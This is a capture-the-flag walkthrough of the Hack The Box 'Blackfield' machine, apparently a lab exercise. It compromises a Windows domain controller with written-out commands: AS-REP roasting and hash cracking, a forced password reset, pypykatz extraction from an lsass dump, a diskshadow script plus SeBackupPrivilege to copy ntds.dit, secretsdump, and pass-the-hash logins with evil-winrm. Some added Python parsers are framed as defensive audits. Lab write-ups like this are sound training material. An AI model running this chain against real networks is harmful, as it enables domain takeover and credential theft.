Blackfield

The document details a penetration testing process on a Windows domain controller at IP 10.10.10.192, including Nmap scans, SMB enumeration, Kerberos user enumeration, and password cracking. It describes gaining access to the system using the 'svc_backup' user and escalating privileges by exploiting the SeBackupPrivilege to extract sensitive files. The final steps involve using the extracted hashes to perform a pass-the-hash attack to gain root access and retrieve user and root flags.
Status Completed

URL https://www.youtube.com/watch?v=IfCysW0Od8w&t

Nmap Scan

[~] - hak101> nmap --min-rate 10000 -p- 10.10.10.192

Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-13 08:56 EDT
Nmap scan report for 10.10.10.192
Host is up (0.22s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
389/tcp open ldap
445/tcp open microsoft-ds
593/tcp open http-rpc-epmap
3268/tcp open globalcatLDAP
5985/tcp open wsman

[~] - hak101> nmap 10.10.10.192 -p 53,88,135,389,445,593,3268,5985 -sC -sV -vv

PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-04-13 19:58:33Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

This is the information we can find from the nmap scan; we can add the domain name to /etc/hosts:

nano /etc/hosts
10.10.10.192 BLACKFIELD.local BLACKFIELD.local.htb

Another thing we noticed is a time difference between our machine and the target: the Kerberos server time reported by Nmap (19:58 UTC) does not match our local scan time (08:56 EDT). This matters because Kerberos rejects authentication attempts when the clock skew is too large.

Since LDAP and Kerberos are present, it's likely the DC.
Let's first enumerate the shares:

[~] - hak101> netexec smb 10.10.10.192 -u '' -p '' --shares

[~] - hak101> netexec smb 10.10.10.192 -u '.' -p '' --shares

When we list shares as the guest user, there's a profiles$ share; we can enumerate it further using the smbclient tool:

[~] - hak101> smbclient //10.10.10.192/profiles$ -U guest

Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> dir

We can see a directory for each user; we can copy all the usernames into a list (users.txt).
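To build users.txt without copying the names by hand, here is an added Python example (not from the original write-up). The listing below is a constructed sample of smbclient's dir output with made-up names; only directory entries are kept, since a profiles share holds one directory per user.

```python
import re

# Constructed sample of the `dir` output from smbclient on the profiles$
# share (names are made up; the real listing has many more entries).
SMB_DIR_OUTPUT = """\
smb: \\> dir
  .                                   D        0  Wed Jun  3 12:47:12 2020
  ..                                  D        0  Wed Jun  3 12:47:12 2020
  AAlleni                             D        0  Wed Jun  3 12:47:11 2020
  ABarteski                           D        0  Wed Jun  3 12:47:11 2020
  notes.txt                           A      512  Wed Jun  3 12:47:11 2020
  svc_backup                          D        0  Wed Jun  3 12:47:11 2020

		5102079 blocks of size 4096. 1695478 blocks available
"""

# smbclient prints: two spaces, name, attribute letters (D = directory,
# A = archive, H = hidden, ...), size, then a date.
ENTRY_RE = re.compile(
    r"^\s{2}(?P<name>.+?)\s+(?P<attrs>[A-Z]+)\s+(?P<size>\d+)\s+"
    r"(?P<date>[A-Z][a-z]{2} [A-Z][a-z]{2}\s+\d+ \d\d:\d\d:\d\d \d{4})$"
)


def usernames_from_listing(text: str, dirs_only: bool = True) -> list[str]:
    """Extract candidate usernames from an smbclient `dir` listing.

    By default only directory entries are kept; '.' and '..' are skipped.
    Order is preserved and duplicates dropped so the result can be fed
    straight to kerbrute / GetNPUsers.py as users.txt.
    """
    seen, users = set(), []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if not m:
            continue  # prompt, blank line, "blocks of size" footer, etc.
        name = m.group("name")
        if name in (".", ".."):
            continue
        if dirs_only and "D" not in m.group("attrs"):
            continue
        if name not in seen:
            seen.add(name)
            users.append(name)
    return users


def userlist_text(text: str) -> str:
    """The content to write to users.txt: one username per line."""
    return "\n".join(usernames_from_listing(text)) + "\n"
```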

Now that we have a list of usernames, we can check for valid ones using the kerbrute tool:

[~/HTB/Blackfeild] - hak101> ./kerbrute_linux_amd64 userenum -d blackfield.local --dc 10.10.10.192 users.txt -o new_users

We can also use GetNPUsers.py

[~/HTB/Blackfeild] - hak101> GetNPUsers.py blackfield.local/ -no-pass -usersfile users.txt -dc-ip 10.10.10.192 | grep -v 'KDC_ERR_C_PRINCIPAL_UNKNOWN'

We got an AS-REP hash for the support user (an account that does not require Kerberos pre-authentication); next we can try to crack it with hashcat:

[~/HTB/Blackfeild] - hak101> hashcat -m 18200 hash-utf8.txt /usr/share/wordlists/rockyou.txt --force

We have cracked the hash

#00^BlackKnight

We can check which shares this user can see:

[~/HTB/Blackfeild] - hak101> netexec smb 10.10.10.192 -u 'support' -p '#00^BlackKnight' --shares

We didn't find anything new here; we can try WinRM on the machine:

[~/HTB/Blackfeild] - hak101> netexec winrm 10.10.10.192 -u 'support' -p '#00^BlackKnight'

We cannot access the box over WinRM; the next option is to collect BloodHound data with these credentials:

[~/HTB/Blackfeild] - hak101> bloodhound-python -c ALL -u support -p '#00^BlackKnight' -d blackfield.local -dc dc01.blackfield.local -ns 10.10.10.192

We now have the files BloodHound needs. Start BloodHound and drag and drop all the files into it:

bloodhound

Blackfield 7
When we check node info for the support user we can see that there's one First Degree Object Control.

We can see that the support user can force-change the password of another user (audit2020); we can do this using rpcclient or the AD tool bloodyAD.

I referred to this blog online for this process:

https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword

Since I have bloodyAD installed, I will be using it.

[~] - hak101> bloodyAD --host "10.10.10.192" -d "blackfield.local" -u "support" -p "#00^BlackKnight" set password "audit2020" "abc123"

It didn't work because the password didn't meet the domain's complexity requirements.

[~] - hak101> bloodyAD --host "10.10.10.192" -d "blackfield.local" -u "support" -p "#00^BlackKnight" set password "audit2020" "Abc@123#"

We can verify with netexec over SMB:

netexec smb 10.10.10.192 -u 'audit2020' -p 'Abc@123#'

We can see that the new credentials we set work; we can try WinRM authentication too:

netexec winrm 10.10.10.192 -u 'audit2020' -p 'Abc@123#'

Unfortunately it didn't work, so we still don't have access to the machine; the next thing we can do is check the shares available to this user:

netexec smb 10.10.10.192 -u 'audit2020' -p 'Abc@123#' --shares

We can see there's a new share named forensic; we can check what it contains by using smbget to download everything from the forensic share:

[~/HTB/Blackfeild] - hak101> smbget --recursive -U "audit2020%Abc@123#" "smb://10.10.10.192/forensic"

The tool took quite a bit of time to download all the .zip files from the memory_analysis directory, and we can see an interesting file named lsass.zip.

lsass.exe holds credentials in memory, which is what mimikatz dumps on a live system, so a memory dump of that process may contain credentials as well. Let's first unzip the file:

[~/HTB/Blackfeild/memory_analysis] - hak101> unzip lsass.zip

Archive: lsass.zip
inflating: lsass.DMP

We got a file named lsass.DMP; now we can extract credentials from it using pypykatz:

[~/HTB/Blackfeild/memory_analysis] - hak101> pypykatz lsa minidump lsass.DMP

We got the NT hash of the svc_backup user; we can check whether it authenticates to the machine:

[~/HTB/Blackfeild] - hak101> netexec smb 10.10.10.192 -u 'svc_backup' -H '9658d

The hash worked over SMB; next we can try it with WinRM:

[~/HTB/Blackfeild] - hak101> netexec winrm 10.10.10.192 -u 'svc_backup' -H '965

The output shows (Pwn3d!), so we can use the evil-winrm tool to log in as this user:

[~/HTB/Blackfeild] - hak101> evil-winrm -i 10.10.10.192 -u 'svc_backup' -H '9658d

We get shell access!

User Flag

*Evil-WinRM* PS C:\Users\svc_backup\Desktop> type user.txt

3920bb317a0bef51027e2852be64****

Privilege Escalation
https://www.youtube.com/watch?v=pWkWIa2dfHY&t=925s

When we check the user for privileges we can see the user has SeBackupPrivilege

*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami /priv

This is the case where SeRestorePrivilege is also needed for the technique to work, and as we can see here we have both.
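As an added example (not from the write-up) of auditing a token the way a defender reviewing service accounts would, this Python snippet parses whoami /priv output and flags privileges such as SeBackupPrivilege and SeRestorePrivilege that bypass file ACLs. The listing is a constructed sample, not the real svc_backup output, and the set of high-impact privileges is my own selection.

```python
# Constructed sample of `whoami /priv` output for a backup-operator style
# account (the real svc_backup listing is not reproduced here).
WHOAMI_PRIV_OUTPUT = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeMachineAccountPrivilege     Add workstations to domain     Disabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
"""

# Privileges that let the holder read or write files regardless of ACLs or
# otherwise reach SYSTEM. SeBackup/SeRestore are the pair this write-up
# chains; the others are commonly audited alongside them (my selection).
HIGH_IMPACT = {
    "SeBackupPrivilege": "read any file, bypassing ACLs (ntds.dit, registry hives)",
    "SeRestorePrivilege": "write any file, bypassing ACLs",
    "SeDebugPrivilege": "open any process, including LSASS",
    "SeImpersonatePrivilege": "impersonate client tokens",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load kernel drivers",
}


def parse_privs(text: str) -> dict[str, str]:
    """Map privilege name -> state ('Enabled'/'Disabled') from whoami /priv.
    Data rows start with 'Se...' and end with the State column."""
    privs = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 3 and parts[0].startswith("Se"):
            privs[parts[0]] = parts[-1]
    return privs


def audit_privs(text: str) -> list[tuple[str, str, str]]:
    """Return (privilege, state, why it matters) for every high-impact
    privilege held by the token. A 'Disabled' privilege is still held and
    can be enabled by the holder, so both states are reported."""
    privs = parse_privs(text)
    return [(p, s, HIGH_IMPACT[p]) for p, s in privs.items() if p in HIGH_IMPACT]


def has_backup_pair(text: str) -> bool:
    """True when the token holds both privileges this write-up relies on."""
    privs = parse_privs(text)
    return "SeBackupPrivilege" in privs and "SeRestorePrivilege" in privs
```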
First, let's make a temp directory in C:\.

*Evil-WinRM* PS C:\> mkdir temp

Excuse me for the error here, I renamed the file to temp

Now we need to install this repository

https://github.com/giuliano108/SeBackupPrivilege

After installing, we can find these two DLLs in SeBackupPrivilege/SeBackupPrivilegeCmdLets/bin/Debug of the tool's folder. We need to transfer them to the C:\temp folder we created on the victim's machine.

We can upload the files using the upload command

*Evil-WinRM* PS C:\temp> upload SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\temp> upload SeBackupPrivilegeUtils.dll

Next, we need to import both modules:

*Evil-WinRM* PS C:\temp> Import-Module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\temp> Import-Module .\SeBackupPrivilegeUtils.dll

We will use the cmdlet Copy-FileSeBackupPrivilege:

Copy-FileSeBackupPrivilege C:\Windows\ntds\ntds.dit C:\temp\ntds.dit

It didn't work because the running domain controller keeps ntds.dit locked, so we need to read it from a shadow copy instead. For this we have a small diskshadow script on the Kali machine:

set context persistent nowriters
set metadata C:\temp\metadata.cab
set verbose on
add volume C: alias privesccopy
create
expose %privesccopy% X:

Save it as copy.txt, and run unix2dos on the file so it uses Windows (CRLF) line endings, which diskshadow expects:

[~/HTB/Blackfeild] - hak101> unix2dos copy.txt

Now let's upload this file to the victim's machine with the evil-winrm access

*Evil-WinRM* PS C:\temp> upload copy.txt

Now we can run it with diskshadow:

*Evil-WinRM* PS C:\temp> diskshadow /s copy.txt

Now the shadow copy of the C: drive is exposed as the X: drive, so we can copy ntds.dit from X: and save it to C:\temp:

Copy-FileSeBackupPrivilege X:\Windows\ntds\ntds.dit C:\temp\ntds.dit

This time the command executed successfully.

Now we can save the SYSTEM registry hive, which holds the boot key needed to decrypt the hashes in ntds.dit:

reg save hklm\system C:\temp\system.back

Running dir now shows the files in the C:\temp directory we created.

Now we download the two files back to our Kali machine:

*Evil-WinRM* PS C:\temp> download ntds.dit
*Evil-WinRM* PS C:\temp> download system.back

Both are huge files, so it will take quite some time

Once we have downloaded both files onto our Kali machine, we can use secretsdump.py to extract the hashes:

secretsdump.py -ntds ntds.dit -system system.back local
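secretsdump.py prints one line per account in the form domain\user:rid:lmhash:nthash:::. As an added example (not part of the write-up), this Python snippet parses that format and flags the two things a defender checks first after such a dump: accounts with an empty password and accounts sharing an NT hash (reused passwords). The dump below is a constructed sample with made-up hashes, except for the well-known empty-string LM and NT values used by the checks.

```python
import re
from collections import defaultdict

# Constructed sample in secretsdump.py's NTDS output format; every hash is
# made up except the two well-known "empty" values below.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of an empty string
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of an empty string

SECRETSDUMP_OUTPUT = f"""\
[*] Target system bootKey: 0x00000000000000000000000000000000
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
Administrator:500:{EMPTY_LM}:00112233445566778899aabbccddeeff:::
Guest:501:{EMPTY_LM}:{EMPTY_NT}:::
DC01$:1000:{EMPTY_LM}:ffeeddccbbaa99887766554433221100:::
krbtgt:502:{EMPTY_LM}:0f1e2d3c4b5a69788796a5b4c3d2e1f0:::
BLACKFIELD.local\\audit2020:1103:{EMPTY_LM}:00112233445566778899aabbccddeeff:::
BLACKFIELD.local\\svc_backup:1413:{EMPTY_LM}:a1b2c3d4e5f60718293a4b5c6d7e8f90:::
[*] Cleaning up...
"""

# domain\ prefix is optional; rid is decimal; LM and NT hashes are 32 hex chars.
LINE_RE = re.compile(r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:]+):(?P<rid>\d+):"
                     r"(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$")


def parse_secretsdump(text: str) -> list[dict]:
    """Return one record per credential line; [*] status lines are ignored."""
    recs = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            recs.append(m.groupdict())
    return recs


def find_weak_accounts(text: str) -> dict[str, list]:
    """Flag empty passwords and NT hashes shared between accounts (the same
    password reused, e.g. by an admin and a service account). Machine
    accounts (names ending in $) have random passwords and are left out of
    the reuse check."""
    recs = parse_secretsdump(text)
    by_nt = defaultdict(list)
    for r in recs:
        if not r["user"].endswith("$"):
            by_nt[r["nt"]].append(r["user"])
    return {
        "empty_password": [r["user"] for r in recs if r["nt"] == EMPTY_NT],
        "shared_hash": [users for users in by_nt.values() if len(users) > 1],
    }
```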

Now we have the hashes of every user in the domain, including the DC hash.
We can do a pass-the-hash attack with the Administrator hash to get root:

[~/HTB/Blackfeild] - hak101> netexec winrm 10.10.10.192 -u 'Administrator' -H 184

[~/HTB/Blackfeild] - hak101> evil-winrm -i 10.10.10.192 -u 'Administrator' -H '184fb

Root Flag

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt

4375a629c7c67c8e29db269060c9****
